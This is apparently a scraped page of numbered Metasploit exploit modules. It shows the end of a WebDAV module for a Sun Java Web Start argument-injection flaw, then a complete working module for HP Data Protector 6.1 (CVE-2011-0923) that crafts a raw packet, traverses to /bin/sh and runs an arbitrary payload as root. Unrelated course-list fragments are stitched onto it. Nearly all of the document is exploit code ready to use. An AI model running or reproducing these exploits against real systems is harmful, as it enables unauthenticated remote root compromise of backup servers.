<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
    else
      print_status("Sending 404 for #{path} ...")
      send_not_found(cli)
      return
    end

    # send the response
    resp = create_response(207, "Multi-Status")
    resp.body = body
    resp['Content-Type'] = 'text/xml'
    cli.send_response(resp)
  end

  #
  # Make sure we're on the right port/path to support WebDAV
  #
  def exploit
    if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
      raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
    end

    super
  end

end

Source: Sun Java Web Start Plugin Command Line Argument Injection (2012)
  22. HP Data Protector 6.1 EXEC_CMD Remote Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Data Protector 6.1 EXEC_CMD Remote Code Execution',
      'Description'    => %q{
          This exploit abuses a vulnerability in the HP Data Protector service. This flaw
        allows an unauthenticated attacker to take advantage of the EXEC_CMD command and
        traverse back to /bin/sh, this allows arbitrary remote code execution under the
        context of root.
      },
      'Author'         =>
        [
          'ch0ks',      # poc
          'c4an',       # msf poc
          'wireghoul'   # Improved msf
        ],
      'References'     =>
        [
          [ 'CVE', '2011-0923'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/'],
          [ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
          [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux']
        ],
      'DisclosureDate' => 'Feb 7 2011',
      'Platform'       => [ 'unix','linux'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 10000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'        =>
        [
          [ 'HP Data Protector 6.10/6.11 on Linux', {}]
        ],
      'DefaultTarget'  => 0
      ))

    register_options([Opt::RPORT(5555),], self.class)
  end

  def exploit
    user = rand_text_alpha(4)
    packet = "\x00\x00\x00\xa4\x20\x32\x00\x20"
    packet << user*2
    packet << "\x00\x20\x30\x00\x20"
    packet << "SYSTEM"
    packet << "\x00\x20\x63\x34\x61\x6e"
    packet << "\x20\x20\x20\x20\x20\x00\x20\x43\x00\x20\x32\x30\x00\x20"
    packet << user
    packet << "\x20\x20\x20\x20\x00\x20"
    packet << "\x50\x6f\x63"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20"
    packet << "NTAUTHORITY"
    packet << "\x00\x20\x30\x00\x20\x30\x00\x20"
    packet << "../../../../../../../../../../"

    shell_mio = "bin/sh"
    salto = "\n"
    s = salto.encode
    shell = shell_mio
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    shell << payload.encoded
    shell << s
    sploit = packet + shell

    begin
      print_status("Sending our command...")
      connect
      sock.put(sploit)
      print_status("Waiting ...")
      handler

      # Read command output from socket if cmd/unix/generic payload was used
      if (datastore['CMD'])
        res = sock.get
        print_status(res.to_s) if not res.empty?
      end
    rescue
      print_error("Error in connection or socket")
    ensure
      disconnect
    end
  end
end

Source: HP Data Protector 6.1 EXEC_CMD Remote Code Execution
  23. Computer Science 1 to 1 (101)
Cryptography
Design and Analysis of Algorithms
Computer Security

These are the ones I signed up for, interesting.